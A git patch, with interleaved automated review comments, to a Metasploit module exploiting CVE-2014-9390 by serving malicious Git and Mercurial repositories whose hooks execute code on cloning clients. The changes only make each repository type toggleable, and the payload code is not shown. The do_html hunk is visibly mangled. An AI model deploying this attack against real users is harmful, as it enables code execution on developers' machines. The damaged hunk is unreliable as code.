From 6c8cecf895e11265801502e0a07f7cba39c0386d Mon Sep 17 00:00:00 2001
From: Jon Hart
Date: Mon, 22 Dec 2014 11:36:50 -0800
Subject: [PATCH] Make git/mercurial support toggle-able, default mercurial to off

---
 .../exploits/multi/http/git_cve_2014_9390.rb | 51 +++++++++++--------
 1 file changed, 31 insertions(+), 20 deletions(-)

diff --git a/modules/exploits/multi/http/git_cve_2014_9390.rb b/modules/exploits/multi/http/git_cve_2014_9390.rb
index 224117b79a..d5de52f996 100644
--- a/modules/exploits/multi/http/git_cve_2014_9390.rb
+++ b/modules/exploits/multi/http/git_cve_2014_9390.rb
@@ -61,16 +61,16 @@ class Metasploit4 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('GIT_URI', [true, 'The URI to use as the malicious Git instance', '/git']),
-        OptString.new('MERCURIAL_URI', [true, 'The URI to use as the malicious Git instance', '/hg']),
+        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty to disable)', '/git']),
+        OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty to disable)', '']),
         OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
       ]
     )
 
     register_advanced_options(
       [
-        OptString.new('GIT_HOOK', [true, 'The Git hook to use for exploitation', 'post-checkout']),
-        OptString.new('MERCURIAL_HOOK', [true, 'The Mercurial hook to use for exploitation', 'update'])
+        OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
+        OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update'])
       ]
     )
   end
@@ -80,13 +80,16 @@ class Metasploit4 < Msf::Exploit::Remote
       git: { files: {}, trigger: nil },
       mercurial: { files: {}, trigger: nil }
     }
-    setup_git
-    setup_mercurial
+    if git_uri.blank? && mercurial_uri.blank?
+      fail ArgumentError, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI'
+    end
+    setup_git unless git_uri.blank?
+    setup_mercurial unless mercurial_uri.blank?
   end
 
   def setup_git
-    # sanity check the malicious URI
-    fail ArgumentError, 'GIT_URI must not be blank' if datastore['GIT_URI'].blank?
+    # URI must start with a /
+    fail ArgumentError, 'GIT_URI must start with a /' unless git_uri =~ /^\//
 
     # sanity check the malicious hook:
     fail ArgumentError, 'GIT_HOOK must not be blank' if datastore['GIT_HOOK'].blank?
@@ -153,8 +156,8 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def setup_mercurial
-    # sanity check the malicious URI
-    fail ArgumentError, 'MERCURIAL_URI must not be blank' if datastore['MERCURIAL_URI'].blank?
+    # URI must start with a /
+    fail ArgumentError, 'MERCURIAL_URI must start with a /' unless mercurial_uri =~ /^\//
     # sanity check the malicious hook:
     fail ArgumentError, 'MERCURIAL_HOOK must not be blank' if datastore['MERCURIAL_HOOK'].blank?
     # TODO: build the fake repository
@@ -175,8 +178,8 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def primer
-    hardcoded_uripath(datastore['GIT_URI'])
-    hardcoded_uripath(datastore['MERCURIAL_URI'])
+    hardcoded_uripath(git_uri) unless git_uri.blank?
+    hardcoded_uripath(mercurial_uri) unless mercurial_uri.blank?
   end
 
   def check_user_agent(cli, req, expected_ua_re = /^.+/)
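Review bot: The new GIT_URI check in setup_git, `unless git_uri =~ /^\//`, anchors with `^`, which in Ruby matches at the start of any line rather than the start of the string, so a multi-line value whose first line does not begin with `/` can still pass; `unless git_uri.start_with?('/')` is both stricter and easier to read, and the same applies to the MERCURIAL_URI check in the setup_mercurial hunk below. The blank-both check added at the top of this hunk sits in a method whose start is outside the hunk. Since the hook options were made optional in the same commit while setup_git/setup_mercurial still reject a blank hook, a short comment above the new `if`, such as `# each repository type is enabled by a non-blank *_URI; its hook is validated in setup_* only when enabled`, would make that coupling visible to the next reader.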
@@ -198,10 +201,10 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def on_request_uri(cli, req)
     if (user_agent = req.headers['User-Agent'])
-      if user_agent =~ /^git\// && req.uri.start_with?(datastore['GIT_URI'])
+      if user_agent =~ /^git\// && req.uri.start_with?(git_uri)
         do_git(cli, req)
         return
-      elsif user_agent =~ /^mercurial\// && req.uri.start_with?(datastore['MERCURIAL_URI'])
+      elsif user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
         do_mercurial(cli, req)
         return
       end
@@ -213,7 +216,7 @@ class Metasploit4 < Msf::Exploit::Remote
   def do_git(cli, req)
     # determine if the requested file is something we know how to serve from our
     # fake repository and send it if so
-    req_file = URI.parse(req.uri).path.gsub(/^#{datastore['GIT_URI']}/, '')
+    req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
     if @repo_data[:git][:files].key?(req_file)
       vprint_status("Sending Git #{req_file}")
       send_response(cli, @repo_data[:git][:files][req_file])
@@ -232,16 +235,16 @@ class Metasploit4 < Msf::Exploit::Remote
   def do_html(cli, _req)
     resp = create_response
-    git_uri = URI.parse(get_uri).merge(datastore['GIT_URI'])
-    mercurial_uri = URI.parse(get_uri).merge(datastore['MERCURIAL_URI'])
+    this_git_uri = URI.parse(get_uri).merge(git_uri)
+    this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
     resp.body = < Public Repositories
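Review bot: With MERCURIAL_URI now defaulting to '' in this commit, the `elsif` branch's `req.uri.start_with?(mercurial_uri)` is true for every request, because `String#start_with?('')` always succeeds, so a request carrying a mercurial/ User-Agent is routed to do_mercurial even though setup_mercurial never ran and its file table is empty; the git branch has the same problem whenever GIT_URI is blanked. Each branch should first check that the feature is enabled, e.g. `if !git_uri.blank? && user_agent =~ /^git\// && req.uri.start_with?(git_uri)` and `elsif !mercurial_uri.blank? && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)`. The body of on_request_uri continues past the end of the hunk.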
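Review bot: `gsub(/^#{git_uri}/, '')` in do_git interpolates the operator-supplied URI into a regex without escaping, so any regex metacharacter in GIT_URI (a `.`, `+` or `?`, for instance) changes what gets stripped, and `^` is again a per-line anchor rather than a start-of-string anchor. A literal, single prefix strip is `req_file = URI.parse(req.uri).path.sub(/\A#{Regexp.escape(git_uri)}/, '')`; the do_mercurial hunk further down has the identical construct with mercurial_uri and needs the same treatment. The remainder of do_git's body lies outside the hunk.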

Here are our public repositories:

@@ -253,7 +256,7 @@ HTML
   def do_mercurial(cli, req)
     # determine if the requested file is something we know how to serve from our
     # fake repository and send it if so
-    req_file = URI.parse(req.uri).path.gsub(/^#{datastore['MERCURIAL_URI']}/, '')
+    req_file = URI.parse(req.uri).path.gsub(/^#{mercurial_uri}/, '')
     if @repo_data[:mercurial][:files].key?(req_file)
       vprint_status("Sending Mercurial #{req_file}")
       send_response(cli, @repo_data[:mercurial][:files][req_file])
@@ -269,4 +272,12 @@ HTML
       send_not_found(cli)
     end
   end
+
+  def git_uri
+    datastore['GIT_URI']
+  end
+
+  def mercurial_uri
+    datastore['MERCURIAL_URI']
+  end
 end
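Review bot: The two new accessors git_uri and mercurial_uri are added as undocumented public methods, even though the rest of the class now relies on their blank/non-blank state to decide whether each repository type is enabled at all. A one-line comment above each would state that contract, e.g. `# URI prefix the fake Git repository is served under; blank or nil means Git support is disabled` and the Mercurial counterpart. As they are only used inside the module, placing them after a `private` marker would also keep them out of the class's public surface.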